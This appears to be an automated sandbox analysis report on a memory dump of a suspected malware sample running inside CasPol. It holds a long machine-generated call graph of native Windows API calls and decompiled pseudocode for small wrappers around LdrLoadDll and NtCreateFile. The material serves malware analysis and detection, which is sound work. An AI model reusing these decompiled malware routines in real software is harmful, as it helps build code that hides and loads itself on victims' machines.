22935 41cd38 22934->22935 22936 41f203 LdrLoadDll 22934->22936 22935->22883 22936->22935 22938 4194e6 22937->22938 22948 4191b7 22937->22948 22938->22919 22941 4192e8 23004 41e593 22941->23004 22942 4192cb 23061 41e693 LdrLoadDll 22942->23061 22945 41930f 22947 420133 2 API calls 22945->22947 22946 4192d5 22946->22919 22951 41931b 22947->22951 22948->22938 23001 41de83 22948->23001 22949 4194aa 22952 41e6c3 2 API calls 22949->22952 22950 4194c0 23067 418ec3 LdrLoadDll NtReadFile NtClose 22950->23067 22951->22946 22951->22949 22951->22950 22956 4193b3 22951->22956 22954 4194b1 22952->22954 22954->22919 22955 4194d3 22955->22919 22957 41941a 22956->22957 22959 4193c2 22956->22959 22957->22949 22958 41942d 22957->22958 23063 41e513 22958->23063 22961 4193c7 22959->22961 22962 4193db 22959->22962 23062 418d83 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 22961->23062 22965 4193e0 22962->22965 22966 4193f8 22962->22966 23007 418e23 22965->23007 22966->22954 23019 418b43 22966->23019 22968 4193d1 22968->22919 22971 41948d 22974 41e6c3 2 API calls 22971->22974 22972 4193ee 22972->22919 22973 419410 22973->22919 22975 419499 22974->22975 22975->22919 22977 41f3de 22976->22977 22978 41f3f0 22977->22978 23085 4200b3 22977->23085 22978->22922 22980 41f410 23088 4187a3 22980->23088 22982 41f433 22982->22978 22983 4187a3 3 API calls 22982->22983 22984 41f455 22983->22984 22984->22978 23113 419b03 22984->23113 22986 41f4dd 22987 41f4ed 22986->22987 23208 41f183 LdrLoadDll 22986->23208 23124 41eff3 22987->23124 22990 41f51b 23203 41e0f3 22990->23203 22992 41f545 22992->22922 22994 41e14f 22993->22994 22995 41f203 LdrLoadDll 22993->22995 23235 176967a 22994->23235 22995->22994 22996 41e16a 22996->22924 22999 41f62f 22998->22999 23238 41e8a3 22998->23238 22999->22885 23002 41f203 LdrLoadDll 23001->23002 23003 41929c 23001->23003 23002->23003 23003->22941 23003->22942 23003->22946 23005 41e5af NtCreateFile 23004->23005 23006 41f203 LdrLoadDll 23004->23006 23005->22945 23006->23005 23008 418e3f 23007->23008 23009 41e513 LdrLoadDll 23008->23009 23010 418e60 23009->23010 23011 418e67 23010->23011 23012 418e7b 23010->23012 23013 41e6c3 2 API calls 23011->23013 23014 41e6c3 2 API calls 23012->23014 23015 418e70 23013->23015 23016 418e84 23014->23016 23015->22972 23068 420253 LdrLoadDll RtlAllocateHeap 23016->23068 23018 418e8f 23018->22972 23020 418bc1 23019->23020 23021 418b8e 23019->23021 23023 418d09 23020->23023 23027 418bdd 23020->23027 23022 41e513 LdrLoadDll 23021->23022 23024 418ba9 23022->23024 23025 41e513 LdrLoadDll 23023->23025 23026 41e6c3 2 API calls 23024->23026 23034 418d24 23025->23034 23028 418bb2 23026->23028 23029 41e513 LdrLoadDll 23027->23029 23028->22973 23030 418bf8 23029->23030 23032 418c14 23030->23032 23033 418bff 23030->23033 23037 418c19 23032->23037 23038 418c2f 23032->23038 23036 41e6c3 2 API calls 23033->23036 23081 41e553 LdrLoadDll 23034->23081 23035 418d5e 23039 41e6c3 2 API calls 23035->23039 23040 418c08 23036->23040 23041 41e6c3 2 API calls 23037->23041 23048 418c34 23038->23048 23069 420213 23038->23069 23042 418d69 23039->23042 23040->22973 23043 418c22 23041->23043 23042->22973 23043->22973 23044 418c43 23044->22973 23047 418c97 23052 418cae 23047->23052 23080 41e4d3 LdrLoadDll 23047->23080 23048->23044 23072 41e643 23048->23072 23050 418cb5 23053 41e6c3 2 API calls 23050->23053 23051 418cca 23054 41e6c3 2 API calls 23051->23054 23052->23050 23052->23051 23053->23044 23055 418cd3 23054->23055 23056 418cff 23055->23056 23075 41ff33 23055->23075 23056->22973 23058 418cea 23059 420133 2 API calls 23058->23059 23060 418cf3 23059->23060 23060->22973 23061->22946 23062->22968 23064 419475 23063->23064 23065 41f203 LdrLoadDll 23063->23065 23066 41e553 LdrLoadDll 23064->23066 23065->23064 23066->22971 23067->22955 23068->23018 23071 42022b 23069->23071 23082 41e863 23069->23082 23071->23048 23073 41f203 LdrLoadDll 23072->23073 23074 41e65f NtReadFile 23073->23074 23074->23047 23076 41ff40 23075->23076 23077 41ff57 23075->23077 23076->23077 23078 420213 2 API calls 23076->23078 23077->23058 23079 41ff6e 23078->23079 23079->23058 23080->23052 23081->23035 23083 41f203 LdrLoadDll 23082->23083 23084 41e87f RtlAllocateHeap 23083->23084 23084->23071 23086 4200e0 23085->23086 23209 41e773 23085->23209 23086->22980 23089 4187b4 23088->23089 23090 4187bc 23088->23090 23089->22982 23112 418a8f 23090->23112 23212 4212b3 23090->23212 23092 418810 23093 4212b3 2 API calls 23092->23093 23096 41881b 23093->23096 23094 418869 23097 4212b3 2 API calls 23094->23097 23096->23094 23217 421353 23096->23217 23099 41887d 23097->23099 23098 4212b3 2 API calls 23101 4188f0 23098->23101 23099->23098 23100 4212b3 2 API calls 23109 418938 23100->23109 23101->23100 23103 418a67 23224 421313 LdrLoadDll RtlFreeHeap 23103->23224 23105 418a71 23225 421313 LdrLoadDll RtlFreeHeap 23105->23225 23107 418a7b 23226 421313 LdrLoadDll RtlFreeHeap 23107->23226 23223 421313 LdrLoadDll RtlFreeHeap 23109->23223 23110 418a85 23227 421313 LdrLoadDll RtlFreeHeap 23110->23227 23112->22982 23114 419b14 23113->23114 23115 4191a3 8 API calls 23114->23115 23120 419b2a 23115->23120 23116 419b33 23116->22986 23117 419b6a 23118 420133 2 API calls 23117->23118 23119 419b7b 23118->23119 23119->22986 23120->23116 23120->23117 23121 419bb6 23120->23121 23122 420133 2 API calls 23121->23122 23123 419bbb 23122->23123 23123->22986 23228 41ee83 23124->23228 23126 41f007 23127 41ee83 LdrLoadDll 23126->23127 23128 41f010 23127->23128 23129 41ee83 LdrLoadDll 23128->23129 23130 41f019 23129->23130 23131 41ee83 LdrLoadDll 23130->23131 23132 41f022 23131->23132 23133 41ee83 LdrLoadDll 23132->23133 23134 41f02b 23133->23134 23135 41ee83 LdrLoadDll 23134->23135 23136 41f034 23135->23136 23137 41ee83 LdrLoadDll 23136->23137 23138 41f040 23137->23138 23139 41ee83 LdrLoadDll 23138->23139 23140 41f049 23139->23140 23141 41ee83 LdrLoadDll 23140->23141 23142 41f052 23141->23142 23143 41ee83 LdrLoadDll 23142->23143 23144 41f05b 23143->23144 23145 41ee83 LdrLoadDll 23144->23145 23146 41f064 23145->23146 23147 41ee83 LdrLoadDll 23146->23147 23148 41f06d 23147->23148 23149 41ee83 LdrLoadDll 23148->23149 23150 41f079 23149->23150 23151 41ee83 LdrLoadDll 23150->23151 23152 41f082 23151->23152 23153 41ee83 LdrLoadDll 23152->23153 23154 41f08b 23153->23154 23155 41ee83 LdrLoadDll 23154->23155 23156 41f094 23155->23156 23157 41ee83 LdrLoadDll 23156->23157 23158 41f09d 23157->23158 23159 41ee83 LdrLoadDll 23158->23159 23160 41f0a6 23159->23160 23161 41ee83 LdrLoadDll 23160->23161 23162 41f0b2 23161->23162 23163 41ee83 LdrLoadDll 23162->23163 23164 41f0bb 23163->23164 23165 41ee83 LdrLoadDll 23164->23165 23166 41f0c4 23165->23166 23167 41ee83 LdrLoadDll 23166->23167 23168 41f0cd 23167->23168 23169 41ee83 LdrLoadDll 23168->23169 23170 41f0d6 23169->23170 23171 41ee83 LdrLoadDll 23170->23171 23172 41f0df 23171->23172 23173 41ee83 LdrLoadDll 23172->23173 23174 41f0eb 23173->23174 23175 41ee83 LdrLoadDll 23174->23175 23176 41f0f4 23175->23176 23177 41ee83 LdrLoadDll 23176->23177 23178 41f0fd 23177->23178 23179 41ee83 LdrLoadDll 23178->23179 23180 41f106 23179->23180 23181 41ee83 LdrLoadDll 23180->23181 23182 41f10f 23181->23182 23183 41ee83 LdrLoadDll 23182->23183 23184 41f118 23183->23184 23185 41ee83 LdrLoadDll 23184->23185 23186 41f124 23185->23186 23187 41ee83 LdrLoadDll 23186->23187 23188 41f12d 23187->23188 23189 41ee83 LdrLoadDll 23188->23189 23190 41f136 23189->23190 23191 41ee83 LdrLoadDll 23190->23191 23192 41f13f 23191->23192 23193 41ee83 LdrLoadDll 23192->23193 23194 41f148 23193->23194 23195 41ee83 LdrLoadDll 23194->23195 23196 41f151 23195->23196 23197 41ee83 LdrLoadDll 23196->23197 23198 41f15d 23197->23198 23199 41ee83 LdrLoadDll 23198->23199 23200 41f166 23199->23200 23201 41ee83 LdrLoadDll 23200->23201 23202 41f16f 23201->23202 23202->22990 23204 41f203 LdrLoadDll 23203->23204 23205 41e10f 23204->23205 23234 1769860 LdrInitializeThunk 23205->23234 23206 41e126 23206->22992 23208->22987 23210 41e78f NtAllocateVirtualMemory 23209->23210 23211 41f203 LdrLoadDll 23209->23211 23210->23086 23211->23210 23213 4212c3 23212->23213 23214 4212c9 23212->23214 23213->23092 23215 420213 2 API calls 23214->23215 23216 4212ef 23215->23216 23216->23092 23218 421378 23217->23218 23219 4213b0 23217->23219 23220 420213 2 API calls 23218->23220 23219->23096 23221 42138d 23220->23221 23222 420133 2 API calls 23221->23222 23222->23219 23223->23103 23224->23105 23225->23107 23226->23110 23227->23112 23229 41ee9e 23228->23229 23230 4195b3 LdrLoadDll 23229->23230 23231 41eebe 23230->23231 23232 4195b3 LdrLoadDll 23231->23232 23233 41ef72 23231->23233 23232->23233 23233->23126 23233->23233 23234->23206 23236 1769681 23235->23236 23237 176968f LdrInitializeThunk 23235->23237 23236->22996 23237->22996 23239 41e8bf RtlFreeHeap 23238->23239 23240 41f203 LdrLoadDll 23238->23240 23239->22999 23240->23239 23242 4094b3 23241->23242 23243 4094ae 23241->23243 23244 4200b3 2 API calls 23242->23244 23243->22930 23251 4094d8 23244->23251 23245 40953b 23245->22930 23246 41e0f3 2 API calls 23246->23251 23247 409541 23248 409567 23247->23248 23250 41e7f3 2 API calls 23247->23250 23248->22930 23252 409558 23250->23252 23251->23245 23251->23246 23251->23247 23253 4200b3 2 API calls 23251->23253 23257 41e7f3 23251->23257 23252->22930 23253->23251 23255 41e7f3 2 API calls 23254->23255 23256 409781 23255->23256 23256->22887 23258 41f203 LdrLoadDll 23257->23258 23259 41e80f 23258->23259 23262 17696e0 LdrInitializeThunk 23259->23262 23260 41e826 23260->23251 23262->23260 23264 41f896 23263->23264 23265 40cf93 LdrLoadDll 23264->23265 23266 40be44 23265->23266 23266->22895 23268 40d306 23267->23268 23268->23268 23270 40d383 23268->23270 23279 41dec3 LdrLoadDll 23268->23279 23270->22900 23272 41ea22 LookupPrivilegeValueW 23271->23272 23273 41f203 LdrLoadDll 23271->23273 23272->22905 23273->23272 23275 41f203 LdrLoadDll 23274->23275 23276 41e4af 23275->23276 23280 1769910 LdrInitializeThunk 23276->23280 23277 41e4ce 23277->22906 23279->23270 23280->23277 23282 40d48a 23281->23282 23283 40d2e3 LdrLoadDll 23282->23283 23284 40d4ed 23283->23284 23284->22857 23286 40ffed 23285->23286 23294 4100a3 23285->23294 23287 40d2e3 LdrLoadDll 23286->23287 23288 41000f 23287->23288 23295 41e173 23288->23295 23290 410051 23291 410097 23290->23291 23298 41e1b3 23290->23298 23293 41e6c3 2 API calls 23291->23293 23293->23294 23294->22860 23294->22861 23296 41e18f 23295->23296 23297 41f203 LdrLoadDll 23295->23297 23296->23290 23297->23296 23299 41e1cf 23298->23299 23300 41f203 LdrLoadDll 23298->23300 23303 1769fe0 LdrInitializeThunk 23299->23303 23300->23299 23301 41e1e6 23301->23291 23303->23301 23305 40de0e 23304->23305 23306 40d463 LdrLoadDll 23305->23306 23307 40de65 23306->23307 23340 40d0e3 23307->23340 23309 40de8b 23339 40e0dc 23309->23339 23349 418ad3 23309->23349 23311 40ded0 23311->23339 23352 40a0d3 23311->23352 23313 40df14 23313->23339 23374 41e733 23313->23374 23317 40df6a 23318 40df71 23317->23318 23386 41e243 23317->23386 23320 420133 2 API calls 23318->23320 23322 40df7e 23320->23322 23322->22874 23323 40dfbb 23324 420133 2 API calls 23323->23324 23325 40dfc2 23324->23325 23325->22874 23326 40dfcb 23327 410193 3 API calls 23326->23327 23328 40e03f 23327->23328 23328->23318 23329 40e04a 23328->23329 23330 420133 2 API calls 23329->23330 23331 40e06e 23330->23331 23391 41e293 23331->23391 23334 41e243 2 API calls 23335 40e0a9 23334->23335 23335->23339 23396 41e053 23335->23396 23338 41e8e3 2 API calls 23338->23339 23339->22874 23341 40d0f0 23340->23341 23342 40d0f4 23340->23342 23341->23309 23343 40d10d 23342->23343 23344 40d13f 23342->23344 23401 41df03 LdrLoadDll 23343->23401 23402 41df03 LdrLoadDll 23344->23402 23346 40d150 23346->23309 23348 40d12f 23348->23309 23350 410193 3 API calls 23349->23350 23351 418af9 23350->23351 23351->23311 23403 40a303 23352->23403 23354 40a2f9 23354->23313 23355 40a0f1 23355->23354 23356 4094a3 4 API calls 23355->23356 23357 40a1cf 23355->23357 23367 40a12f 23356->23367 23357->23354 23358 40a2af 23357->23358 23359 4094a3 4 API calls 23357->23359 23358->23354 23450 410403 10 API calls 23358->23450 23371 40a20c 23359->23371 23361 40a2c3 23361->23354 23451 410403 10 API calls 23361->23451 23363 40a2d9 23363->23354 23452 410403 10 API calls 23363->23452 23365 40a2ef 23365->23313 23367->23357 23368 40a1c5 23367->23368 23417 409db3 23367->23417 23369 409763 2 API calls 23368->23369 23369->23357 23370 409db3 14 API calls 23370->23371 23371->23358 23371->23370 23372 40a2a5 23371->23372 23373 409763 2 API calls 23372->23373 23373->23358 23375 41f203 LdrLoadDll 23374->23375 23376 41e74f 23375->23376 23377 40df4b 23376->23377 23534 17698f0 LdrInitializeThunk 23376->23534 23379 410193 23377->23379 23380 4101b0 23379->23380 23535 41e1f3 23380->23535 23383 4101f8 23383->23317 23384 41e243 2 API calls 23385 410221 23384->23385 23385->23317 23387 41f203 LdrLoadDll 23386->23387 23388 41e25f 23387->23388 23541 1769780 LdrInitializeThunk 23388->23541 23389 40dfae 23389->23323 23389->23326 23392 41f203 LdrLoadDll 23391->23392 23393 41e2af 23392->23393 23542 17697a0 LdrInitializeThunk 23393->23542 23394 40e082 23394->23334 23397 41f203 LdrLoadDll 23396->23397 23398 41e06f 23397->23398 23543 1769a20 LdrInitializeThunk 23398->23543 23399 40e0d5 23399->23338 23401->23348 23402->23346 23404 40a32a 23403->23404 23405 4094a3 4 API calls 23404->23405 23412 40a58f 23404->23412 23406 40a37d 23405->23406 23407 409763 2 API calls 23406->23407 23406->23412 23408 40a40c 23407->23408 23409 4094a3 4 API calls 23408->23409 23408->23412 23410 40a421 23409->23410 23411 409763 2 API calls 23410->23411 23410->23412 23414 40a481 23411->23414 23412->23355 23413 4094a3 4 API calls 23413->23414 23414->23412 23414->23413 23415 409db3 14 API calls 23414->23415 23416 409763 2 API calls 23414->23416 23415->23414 23416->23414 23418 409dd8 23417->23418 23453 41df43 23418->23453 23421 409e2c 23421->23367 23422 409ead 23486 4102e3 LdrLoadDll NtClose 23422->23486 23423 41e133 2 API calls 23424 409e50 23423->23424 23424->23422 23425 409e5b 23424->23425 23427 409ed9 23425->23427 23456 40e0f3 23425->23456 23427->23367 23428 409ec8 23429 409ee5 23428->23429 23430 409ecf 23428->23430 23487 41dfc3 LdrLoadDll 23429->23487 23432 41e6c3 2 API calls 23430->23432 23432->23427 23433 409e75 23433->23427 23476 409be3 23433->23476 23435 409f10 23437 40e0f3 5 API calls 23435->23437 23439 409f30 23437->23439 23439->23427 23488 41dff3 LdrLoadDll 23439->23488 23441 409f55 23489 41e083 LdrLoadDll 23441->23489 23443 409f6f 23444 41e053 2 API calls 23443->23444 23445 409f7e 23444->23445 23446 41e6c3 2 API calls 23445->23446 23447 409f88 23446->23447 23490 4099b3 23447->23490 23449 409f9c 23449->23367 23450->23361 23451->23363 23452->23365 23454 41f203 LdrLoadDll 23453->23454 23455 409e22 23454->23455 23455->23421 23455->23422 23455->23423 23457 40e121 23456->23457 23458 410193 3 API calls 23457->23458 23459 40e183 23458->23459 23460 40e1cc 23459->23460 23461 41e243 2 API calls 23459->23461 23460->23433 23462 40e1ae 23461->23462 23463 40e1b8 23462->23463 23466 40e1d8 23462->23466 23464 41e293 2 API calls 23463->23464 23465 40e1c2 23464->23465 23467 41e6c3 2 API calls 23465->23467 23468 40e262 23466->23468 23469 40e245 23466->23469 23467->23460 23471 41e293 2 API calls 23468->23471 23470 41e6c3 2 API calls 23469->23470 23472 40e24f 23470->23472 23473 40e271 23471->23473 23472->23433 23474 41e6c3 2 API calls 23473->23474 23475 40e27b 23474->23475 23475->23433 23477 409bf9 23476->23477 23482 409d84 23477->23482 23506 4097a3 23477->23506 23479 409cf8 23480 4099b3 11 API calls 23479->23480 23479->23482 23481 409d26 23480->23481 23481->23482 23483 41e133 2 API calls 23481->23483 23482->23367 23484 409d5b 23483->23484 23484->23482 23485 41e733 2 API calls 23484->23485 23485->23482 23486->23428 23487->23435 23488->23441 23489->23443 23491 4099dc 23490->23491 23513 409913 23491->23513 23494 41e733 2 API calls 23495 4099ef 23494->23495 23495->23494 23496 409a7a 23495->23496 23497 409a75 23495->23497 23521 410363 23495->23521 23496->23449 23498 41e6c3 2 API calls 23497->23498 23499 409aad 23498->23499 23499->23496 23500 41df43 LdrLoadDll 23499->23500 23501 409b12 23500->23501 23501->23496 23525 41df83 23501->23525 23503 409b76 23503->23496 23504 4191a3 8 API calls 23503->23504 23505 409bcb 23504->23505 23505->23449 23507 4098a2 23506->23507 23508 4097b8 23506->23508 23507->23479 23508->23507 23509 4191a3 8 API calls 23508->23509 23510 409825 23509->23510 23511 420133 2 API calls 23510->23511 23512 40984c 23510->23512 23511->23512 23512->23479 23514 40992d 23513->23514 23515 40cf93 LdrLoadDll 23514->23515 23516 409948 23515->23516 23517 4195b3 LdrLoadDll 23516->23517 23518 409960 23517->23518 23519 40997c 23518->23519 23520 409969 PostThreadMessageW 23518->23520 23519->23495 23520->23519 23522 410376 23521->23522 23528 41e0c3 23522->23528 23526 41df9f 23525->23526 23527 41f203 LdrLoadDll 23525->23527 23526->23503 23527->23526 23529 41f203 LdrLoadDll 23528->23529 23530 41e0df 23529->23530 23533 1769840 LdrInitializeThunk 23530->23533 23531 4103a1 23531->23495 23533->23531 23534->23377 23536 41f203 LdrLoadDll 23535->23536 23537 41e20f 23536->23537 23540 17699a0 LdrInitializeThunk 23537->23540 23538 4101f1 23538->23383 23538->23384 23540->23538 23541->23389 23542->23394 23543->23399

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 0040CF93 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 148 40cf93-40cfaf 149 40cfb7-40cfbc 148->149 150 40cfb2 call 420ed3 148->150 151 40cfc2-40cfd0 call 4213f3 149->151 152 40cfbe-40cfc1 149->152 150->149 155 40cfe0-40cff1 call 41f773 151->155 156 40cfd2-40cfdd call 421673 151->156 161 40cff3-40d007 LdrLoadDll 155->161 162 40d00a-40d00d 155->162 156->155 161->162
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0040CF93(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420ED3( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E004213F3(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421673( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F773(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                                                                                                                                                                                0x0040cfaf
                                                                                                                                                                                                                                                                                                0x0040cfb2
                                                                                                                                                                                                                                                                                                0x0040cfb7
                                                                                                                                                                                                                                                                                                0x0040cfbc
                                                                                                                                                                                                                                                                                                0x0040cfc6
                                                                                                                                                                                                                                                                                                0x0040cfcb
                                                                                                                                                                                                                                                                                                0x0040cfce
                                                                                                                                                                                                                                                                                                0x0040cfd0
                                                                                                                                                                                                                                                                                                0x0040cfd8
                                                                                                                                                                                                                                                                                                0x0040cfdd
                                                                                                                                                                                                                                                                                                0x0040cfdd
                                                                                                                                                                                                                                                                                                0x0040cfe4
                                                                                                                                                                                                                                                                                                0x0040cfec
                                                                                                                                                                                                                                                                                                0x0040cfef
                                                                                                                                                                                                                                                                                                0x0040cff1
                                                                                                                                                                                                                                                                                                0x0040d005
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0040d007
                                                                                                                                                                                                                                                                                                0x0040d00d
                                                                                                                                                                                                                                                                                                0x0040cfc1
                                                                                                                                                                                                                                                                                                0x0040cfc1
                                                                                                                                                                                                                                                                                                0x0040cfc1

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040D005
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
                                                                                                                                                                                                                                                                                                • Instruction ID: bbe13f3015e6297afeaca4817b923598490fab2ca7d40facc20e4f3c260de4dd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D50152B1E0020DB7DB10DBE1DC82F9EB3789B14308F0041A6E908A7280F675EB498755
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E58E Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 163 41e58e-41e5e4 call 41f203 NtCreateFile
                                                                                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                                			E0041E58E(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				asm("o16 sub [eax-0x1374aae0], dh");
				_t15 = _a4;
				_t3 = _t15 + 0xa6c; // 0xa6c
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                                                                                                                                                                                                                                0x0041e58f
                                                                                                                                                                                                                                                                                                0x0041e596
                                                                                                                                                                                                                                                                                                0x0041e5a2
                                                                                                                                                                                                                                                                                                0x0041e5aa
                                                                                                                                                                                                                                                                                                0x0041e5e0
                                                                                                                                                                                                                                                                                                0x0041e5e4

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5E0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                                                                                                                                                                                                                                                • Instruction ID: 3e8d1509aa00af463a8d37bfd54f617173c4f7fb56af6955cf88f9c58c8e7bef
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC01CFB2205148AFCB48CF99DC88EEB37A9AF8C354F058248FA4D97241C630EC51CBA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E593 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 166 41e593-41e5a9 167 41e5af-41e5e4 NtCreateFile 166->167 168 41e5aa call 41f203 166->168 168->167
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E593(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                                                                                                                                                                                                                                0x0041e5a2
                                                                                                                                                                                                                                                                                                0x0041e5aa
                                                                                                                                                                                                                                                                                                0x0041e5e0
                                                                                                                                                                                                                                                                                                0x0041e5e4

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5E0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                                                                                                                                                                                                • Instruction ID: 2b5a8fab2cb6a3536000231a5b839166af3a1201867cde8835e6817bdec1c646
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E63D Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 169 41e63d-41e659 170 41e65f-41e68c NtReadFile 169->170 171 41e65a call 41f203 169->171 171->170
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • NtReadFile.NTDLL(004194D3,0041499B,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,0041499B,004194D3,00000002,00000000), ref: 0041E688
